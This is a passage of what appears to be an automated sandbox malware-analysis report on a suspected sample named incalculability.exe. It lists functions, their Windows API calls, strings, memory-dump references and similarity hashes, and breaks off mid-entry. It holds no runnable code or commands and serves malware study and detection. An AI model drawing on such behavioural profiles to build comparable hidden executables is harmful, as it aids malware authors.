                            • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                            • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                            • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                            • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                            Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                            • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow
                            • String ID:
                            • API String ID: 312131281-0
                            • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                            • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                            • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                            • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                            Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                            • String ID:
                            • API String ID: 3771399671-0
                            • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                            • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                            • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                            • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                            Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00434643
                            • GetForegroundWindow.USER32(00000000), ref: 00434655
                            • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                            • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                            • String ID:
                            • API String ID: 2156557900-0
                            • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                            • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                            • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                            • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                            Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 0-1603158881
                            • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                            • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                            • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                            • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                            Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                            Download Yara Rule
                            APIs
                            • CreateMenu.USER32 ref: 00448603
                            • SetMenu.USER32(?,00000000), ref: 00448613
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                            • IsMenu.USER32(?), ref: 004486AB
                            • CreatePopupMenu.USER32 ref: 004486B5
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                            • DrawMenuBar.USER32 ref: 004486F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                            • String ID: 0
                            • API String ID: 161812096-4108050209
                            • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                            • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                            • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                            • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                            Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Local\inhumate\incalculability.exe), ref: 00434057
                            • LoadStringW.USER32(00000000), ref: 00434060
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                            • LoadStringW.USER32(00000000), ref: 00434078
                            • _wprintf.LIBCMT ref: 004340A1
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                            • C:\Users\user\AppData\Local\inhumate\incalculability.exe, xrefs: 00434040
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            • API String ID: 3648134473-575510335
                            • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                            • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                            • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                            • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                            Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                            • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                            • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                            • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                            Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\inhumate\incalculability.exe,0040F545,C:\Users\user\AppData\Local\inhumate\incalculability.exe,004A90E8,C:\Users\user\AppData\Local\inhumate\incalculability.exe,?,0040F545), ref: 0041013C
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                            • MoveFileW.KERNEL32(?,?), ref: 00453932
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                            • String ID:
                            • API String ID: 978794511-0
                            • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                            • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                            • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                            • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                            Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                            • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                            • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                            • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                            Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                            Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove$_memcmp
                            • String ID: '$\$h
                            • API String ID: 2205784470-1303700344
                            • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                            • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                            • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                            • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                            Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                            • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                            • VariantClear.OLEAUT32 ref: 0045EA6D
                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                            • __swprintf.LIBCMT ref: 0045EC33
                            • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                            Strings
                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                            • String ID: %4d%02d%02d%02d%02d%02d
                            • API String ID: 2441338619-1568723262
                            • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                            • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                            • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                            • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                            Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                            • Sleep.KERNEL32(0000000A), ref: 0042C67F
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Interlocked$DecrementIncrement$Sleep
                            • String ID: @COM_EVENTOBJ
                            • API String ID: 327565842-2228938565
                            • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                            • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                            • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                            • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                            Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                            Download Yara Rule
                            APIs
                            • VariantClear.OLEAUT32(?), ref: 0047031B
                            • VariantClear.OLEAUT32(?), ref: 0047044F
                            • VariantInit.OLEAUT32(?), ref: 004704A3
                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                            • VariantClear.OLEAUT32(?), ref: 00470516
                              • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                            • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                              • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                            • String ID: H
                            • API String ID: 3613100350-2852464175
                            • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                            • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                            • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                            • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                            Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                            Download Yara Rule
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                            • DestroyWindow.USER32(?), ref: 00426F50
                            • UnregisterHotKey.USER32(?), ref: 00426F77
                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
